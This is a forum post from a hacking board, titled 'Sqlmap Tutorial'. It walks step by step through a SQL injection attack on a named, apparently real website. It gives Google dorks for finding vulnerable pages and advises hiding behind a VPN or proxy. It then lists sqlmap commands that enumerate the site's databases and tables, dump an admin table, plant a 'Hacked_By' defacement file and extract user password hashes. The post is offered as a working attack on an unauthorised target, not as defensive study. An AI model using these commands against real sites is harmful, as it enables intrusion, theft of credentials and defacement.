Thread: Sqlmap Tutorial
View Single Post
  #1 Old 01-13-2016, 08:14 AM
Helper
VERIFIED
 
Helper's Avatar
 
Join Date: Jun 2014
Posts: 166
Contact: 555-278-026
Helper is on a distinguished road
Send a message via ICQ to Helper
Default Sqlmap Tutorial
Hello All Members!

Injection Tool: sqlmap

Official Page: http://sqlmap.org

Download Link: https://github.com/sqlmapproject/sqlmap/zipball/master

Testing: WIndows XP/SP3 , Python 2.7.5

vulnerability Page: http://www.godwins-law.co.uk/staff.php?id=10'

!!!!! Use OpenVPN OR PROXY !!!!!

Step1. Target

Google Dork: inurl:index.php , inurl:staff.php , inurl:show.php , inurl:login.php , etc...

Target: http://www.godwins-law.co.uk/staff.php?id=10

Target WebServer Operating System: WIndows 2003

Target WebApplication: ASP.NET , Microsoft IIS 6.0 , PHP 5.2.8

Target BackEndDataBase: MySQL 5.0.0

Step2. DataBase

sqlmap.py -u "www.godwins-law.co.uk/staff.php?id=10" --dbms=mysql --dbs

--database--

godwins
information_schema

Step3. Table

sqlmap.py -u "www.godwins-law.co.uk/staff.php?id=10" --dbms=mysql -D godwins --tables

--table--

adminhelp
articlecats
articles
contentimages
imagelib
news
pages
staff

Step4. Column & Dump

sqlmap.py -u "www.godwins-law.co.uk/staff.php?id=10" --dbms=mysql -D godwins -T adminhelp --columns

sqlmap.py -u "www.godwins-law.co.uk/staff.php?id=10" --dbms=mysql -D godwins -T adminhelp --dump

Step5. Hacked Text

sqlmap.py -u "www.godwins-law.co.uk/staff.php?id=10" --dbms=mysql --file-dest=Hacked_By_sasami_327.txt

sqlmap.py -u "www.godwins-law.co.uk/staff.php?id=10" --dbms=mysql --file-read=Hacked_By_sasami_327.txt

Step6. user & password

sqlmap.py -u "www.godwins-law.co.uk/staff.php?id=10" --dbms=mysql --users --passwords
__________________
Helper is offline   Reply With Quote